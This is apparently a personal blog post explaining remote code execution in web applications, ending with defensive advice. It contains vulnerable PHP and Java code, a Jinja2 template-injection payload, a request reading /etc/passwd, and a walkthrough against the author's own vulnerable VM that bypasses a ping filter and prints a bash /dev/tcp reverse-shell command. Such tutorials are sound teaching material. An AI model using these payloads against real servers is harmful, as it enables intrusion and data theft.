Secure Your Website Against Remote Code Execution Attacks

proxydomproxydom
4 min read

Table of contents

Hello there! I’m finally done with my exams, so i have more free time to dedicate to my blog and my projects.

Not gonna waste time, let’s dive in.

Definition of Remote Code Execution (RCE)

A Remote Code Execution (RCE) vulnerability in a website allows an attacker to run malicious code on the server hosting the site. This happens when the website fails to properly validate user input, letting attackers inject and execute commands. A successful RCE can lead to full server compromise, data theft, or further attacks.

Technical Deep Dive: How Web RCE Works

RCE in web applications typically occurs due to:

  1. Unsafe Input Handling

    • Directly passing user input to dangerous functions (e.g., eval(), system(), exec() in PHP/Python).

      Example (PHP):

        $command = $_GET['cmd'];  
  system($command); // Attacker sends whatever command and it gets executed

  2. Deserialization Attacks

    • Insecure parsing of serialized objects (e.g., PHP unserialize(), Python pickle).

    • Malicious payloads trigger code execution during deserialization.

  3. Server-Side Template Injection (SSTI)

    • Injecting code into templating engines (e.g., Jinja2, Twig).

    • Example (Jinja2 exploit):

    •   {{ config.__class__.__init__.__globals__['os'].popen('id').read() }}

  4. File Upload Bypasses

    • Uploading malicious files (.php, .jsp) that execute when accessed.

Common Exploit Scenarios

  • PHP RCE via shell_exec:

      GET /vulnerable.php?cmd=cat+/etc/passwd

  • Python Flask SSTI:

      GET /profile?name={{7*7}}  # Test for SSTI → Outputs "49"

  • Java Runtime.exec() Exploit:

      String cmd = request.getParameter("cmd");
  Runtime.getRuntime().exec(cmd); // Blind RCE

But how do i know if my server is vulnerable?

For visual learners like me, i made a vulnerable VM with some vulnerabilities (SQL injection, RCE, IDOR and so on).

The site is written in Italian. Comment if you need a translation.

Here we have an admin panel, with a basic ping function.

First of all, let’s see what happens with a normal input:

As we can see, it pings www.google.com.

Now, let’s try some basic injection with & and ;.

Well, neither works (they are blacklisted).

Let’s try with the pipe command (this one: | )

The pipe (|) takes the output of one command and passes it as input to another.

For example:
cat file.txt | grep “password”

It will print the file “file.txt” but will only show the line that contains “password”.

It worked. Now we can execute commands (in this case, i will retrieve the flag).

Obviously, you can use nc or socat to have a reverse shell. Doing so will hang the browser window.

If the server doesn’t have netcat or socat, you can use this one:

bash -i >& /dev/tcp/yourip/yourport 0>&1

  • bash -i spawns an interactive shell.

  • >& /dev/tcp/yourip/yourport

    • >&: Redirects both stdout and stderr (file descriptors 1 and 2).

    • /dev/tcp/yourip/yourport: Opens a TCP socket connection to yourip:yourport.

      • (Linux treats /dev/tcp/HOST/PORT as a virtual file for TCP connections.)

  • 0>&1

    • Redirects stdin (file descriptor 0) to the same TCP socket (&1 references stdout).

    • Ensures the attacker can send commands to the shell.

I suggest you use base64 for encoding, so you are not going to have problems with encoding and stuff.

Just for demonstration, i will use the bash one (base64 encoded):

Done. We got a shell, and retrieved the flag. From there, we can do lateral pivoting or try to escalate privileges.

How can i protect myself then?

There are a various methods to defend yourself:

  • Input Validation: Strict whitelist filtering for user-supplied data.

  • Disable Dangerous Functions: Restrict eval(), exec(), system() in PHP/Python.

  • Use Safe APIs: Replace direct shell commands with library functions.

  • Web Application Firewall (WAF): Block known RCE payloads.

  • Least Privilege: Run web server with minimal permissions (the user www-data should be fine, but make sure it can’t do anything apart from loading your site).

Conclusion

RCE is critical because it bypasses front-end security, granting direct server access. Always audit code for uncontrolled input usage, analyze traffic with wireshark or tcpdump, and check for weird or unusual connections.

0
Subscribe to my newsletter

Read articles from proxydom directly inside your inbox. Subscribe to the newsletter, and don't miss out.

#cybersecuritycybersecurityCyberSechackingethicalhackingSecurityWeb DevelopmentwebsecuritysysadminIT

Written by

proxydom
proxydom

Italian college student who loves cats, beer and ethical hacking.